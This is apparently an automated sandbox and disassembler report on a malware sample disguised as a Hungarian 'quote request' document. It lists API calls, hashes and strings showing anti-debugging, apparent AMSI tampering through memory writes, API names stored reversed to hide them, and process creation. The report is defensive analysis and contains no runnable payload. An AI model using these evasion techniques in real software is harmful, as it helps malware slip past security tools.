• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleLibraryModuleProc$FreeMemoryReadVirtual$AllocateCounterCreateLoadOpenPerformanceProcessQueryThreadWrite
                                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$ZMy0$ZMy0Z]v0$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                                                                                                                                  • API String ID: 341001173-829192164
                                                                                                                                                  • Opcode ID: 174188d90f83e8ea5ea26904750c60cfb55ec1767d2406bddd89ccf34adc2658
                                                                                                                                                  • Instruction ID: e93e0cc975083e44941a1bf894d8df3925df837484a2344ef8e5fe346cc19fb8
                                                                                                                                                  • Opcode Fuzzy Hash: 174188d90f83e8ea5ea26904750c60cfb55ec1767d2406bddd89ccf34adc2658
                                                                                                                                                  • Instruction Fuzzy Hash: 9EF2FD35B002589FDB12EB64DD94BDEB3BAFFC9700F1051F29008AB254DA70AE568F95

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 10170 29a5acc-29a5b0d GetModuleFileNameA RegOpenKeyExA 10171 29a5b4f-29a5b92 call 29a5908 RegQueryValueExA 10170->10171 10172 29a5b0f-29a5b2b RegOpenKeyExA 10170->10172 10177 29a5bb6-29a5bd0 RegCloseKey 10171->10177 10178 29a5b94-29a5bb0 RegQueryValueExA 10171->10178 10172->10171 10173 29a5b2d-29a5b49 RegOpenKeyExA 10172->10173 10173->10171 10175 29a5bd8-29a5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10173->10175 10179 29a5c0f-29a5c13 10175->10179 10180 29a5cf2-29a5cf9 10175->10180 10178->10177 10183 29a5bb2 10178->10183 10181 29a5c1f-29a5c35 lstrlenA 10179->10181 10182 29a5c15-29a5c19 10179->10182 10185 29a5c38-29a5c3b 10181->10185 10182->10180 10182->10181 10183->10177 10186 29a5c3d-29a5c45 10185->10186 10187 29a5c47-29a5c4f 10185->10187 10186->10187 10188 29a5c37 10186->10188 10187->10180 10189 29a5c55-29a5c5a 10187->10189 10188->10185 10190 29a5c5c-29a5c82 lstrcpynA LoadLibraryExA 10189->10190 10191 29a5c84-29a5c86 10189->10191 10190->10191 10191->10180 10192 29a5c88-29a5c8c 10191->10192 10192->10180 10193 29a5c8e-29a5cbe lstrcpynA LoadLibraryExA 10192->10193 10193->10180 10194 29a5cc0-29a5cf0 lstrcpynA LoadLibraryExA 10193->10194 10194->10180
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,029A0000,029CE790), ref: 029A5AE8
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029A0000,029CE790), ref: 029A5B06
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029A0000,029CE790), ref: 029A5B24
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029A5B42
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029A5B8B
• RegQueryValueExA.ADVAPI32(?,029A5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029A5BD1,?,80000001), ref: 029A5BA9
• RegCloseKey.ADVAPI32(?,029A5BD8,00000000,?,?,00000000,029A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029A5BCB
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029A5BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029A5BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029A5BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029A5C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029A5C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029A5C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029A5CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029A5CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029A5CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029A5CEB
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_Árajánlat kérés MOL093478524·docx.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1759228003-2375825460

Control-flow Graph (graph image omitted)
APIs
• LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
  • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912

Control-flow Graph (graph image omitted)
APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 029BF754
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 029BF766
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 029BF77D
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669

Control-flow Graph

APIs
  • Part of subcall function 029A4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 029A4F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDE40), ref: 029BDDAB
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,029BDE40), ref: 029BDDDB
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 029BDDF0
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 029BDE1C
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 029BDE25
  • Part of subcall function 029A4C60: SysFreeString.OLEAUT32(029BF4A4), ref: 029A4C6E
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029BE5F6
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
APIs
  • Part of subcall function 029A4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 029A4F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDD5E), ref: 029BDCCB
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029BDD05
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029BDD32
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029BDD3B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3764614163-0
                                                                                                                                                  • Opcode ID: cd6a81b72ed38561eadb1a1d0af903a06f1c2c285b1b19cf322fd2ecef928648
                                                                                                                                                  • Instruction ID: 6b7e5a4c1b55c5c846f350de9b43bd1cb708aa125c96190ee5eba58a8057c82c
                                                                                                                                                  • Opcode Fuzzy Hash: cd6a81b72ed38561eadb1a1d0af903a06f1c2c285b1b19cf322fd2ecef928648
                                                                                                                                                  • Instruction Fuzzy Hash: AC21ED71A40318BAEB11EAA0CD52FDEB7BDEF88B00F614465B604F75C0D7B06A048AA4
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029B8814
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                  • API String ID: 3130163322-2353454454
                                                                                                                                                  • Opcode ID: a65fa411d17544836610c8f39a2dd27d975fb13c2a1c2c37653f1ba8ca92ecbc
                                                                                                                                                  • Instruction ID: 6737a935694f7fd718be790e46f719f19a8aaf641b6cf832d05ebd67765a5ed2
                                                                                                                                                  • Opcode Fuzzy Hash: a65fa411d17544836610c8f39a2dd27d975fb13c2a1c2c37653f1ba8ca92ecbc
                                                                                                                                                  • Instruction Fuzzy Hash: B411C2B2640248AFEB41EEACDE91FAA77EDFB8C700F514460FA08D7240C674ED108B64
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                                                  • Opcode ID: 7ead9a6da39cebd7a6d99c2d47fffb7e420aa99b5150a5caddaf6aa592887f24
                                                                                                                                                  • Instruction ID: 38d6eabd46f01b69d54671e8ec16e1825bacd20273d44bcfe40d40ab066cd3cc
                                                                                                                                                  • Opcode Fuzzy Hash: 7ead9a6da39cebd7a6d99c2d47fffb7e420aa99b5150a5caddaf6aa592887f24
                                                                                                                                                  • Instruction Fuzzy Hash: C4113C75640208BFEB01EFA4DD51EEAB7ADEB89700F414460F900D7640DA70AA148B60
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                                                  • Opcode ID: 75e203dc8f74374f029aaa1bbc4a798dbb4ad72f32a2b3349107b957bf3eae71
                                                                                                                                                  • Instruction ID: efa1b6b9d7b97a0130a1973035045890eec3d7ff5148b487eff5f5541ecd1077
                                                                                                                                                  • Opcode Fuzzy Hash: 75e203dc8f74374f029aaa1bbc4a798dbb4ad72f32a2b3349107b957bf3eae71
                                                                                                                                                  • Instruction Fuzzy Hash: 5C115B75640308BFEB01EFA4DEA1EEEB7ADEFC9700F4144A0F900D7640DA70AA148B60
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                  • API String ID: 2719805696-3542721025
                                                                                                                                                  • Opcode ID: ac390abf8189c7d4674a92d76e83dbd75a324ac41d99fe93ff22ae5ea0832304
                                                                                                                                                  • Instruction ID: 5d216793fc2123a4211fabd6ef302743520ef302ebb7fad2ea5db5673125fd0d
                                                                                                                                                  • Opcode Fuzzy Hash: ac390abf8189c7d4674a92d76e83dbd75a324ac41d99fe93ff22ae5ea0832304
                                                                                                                                                  • Instruction Fuzzy Hash: 10015B7A640204AFDB11EF98DD51EDAB7EDEFC9700F515450F804D7650CA70AE108BA0
                                                                                                                                                  APIs
                                                                                                                                                  • RtlI.N(?,?,00000000,029BDC7E), ref: 029BDC2C
                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC42
                                                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Path$DeleteFileNameName_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4284456518-0
                                                                                                                                                  • Opcode ID: 614f3707581093408c4c59f015ced92853e419913fcea856d41d070ae9322b44
                                                                                                                                                  • Instruction ID: ea2c7312e6eff16b858ea3021c51a6377c7d9d1b5222e124d48ef7e5097627db
                                                                                                                                                  • Opcode Fuzzy Hash: 614f3707581093408c4c59f015ced92853e419913fcea856d41d070ae9322b44
                                                                                                                                                  • Instruction Fuzzy Hash: 1301627594430D6EEB06DBA08E41FCD77B9AF85704F5144929200E6081DBB5AB048B74
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029A4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 029A4F2E
                                                                                                                                                  • RtlI.N(?,?,00000000,029BDC7E), ref: 029BDC2C
                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC42
                                                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC61
                                                                                                                                                    • Part of subcall function 029A4C60: SysFreeString.OLEAUT32(029BF4A4), ref: 029A4C6E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1530111750-0
                                                                                                                                                  • Opcode ID: 172c2440ee2b7cd4d142ec34d3847a3c52e9b137f1c4e10f3d2536ff04da29a1
                                                                                                                                                  • Instruction ID: d5c2b215bc9b5f9ac744c012ed5b3c37627ebb91a05153ab38a0822248883f14
                                                                                                                                                  • Opcode Fuzzy Hash: 172c2440ee2b7cd4d142ec34d3847a3c52e9b137f1c4e10f3d2536ff04da29a1
                                                                                                                                                  • Instruction Fuzzy Hash: A301F47594020CBEEB11EBA0DE52FDDB3BDEF88700F5144B5E601E6580EBB56B048A74
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,029B6DB9,?,?,?,00000000), ref: 029B6D99
                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,029B6EAC,00000000,00000000,029B6E2B,?,00000000,029B6E9B), ref: 029B6E17
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2151042543-0
                                                                                                                                                  • Opcode ID: 05ca8fcbb739c14378c54a30642bb0ec9203736aab8d91503c0a66b1c023fb93
                                                                                                                                                  • Instruction ID: 7ba31a287d74f476082f076c1a43075c14e90d9a535ac27cc55966072a154506
                                                                                                                                                  • Opcode Fuzzy Hash: 05ca8fcbb739c14378c54a30642bb0ec9203736aab8d91503c0a66b1c023fb93
                                                                                                                                                  • Instruction Fuzzy Hash: 9F012B35608704AEF712EF61DD228AF7BFDEFC9B00F510835F405D2680E630A910CA60
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029BAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029BADA3,?,?,029BAE35,00000000,029BAF11), ref: 029BAB30
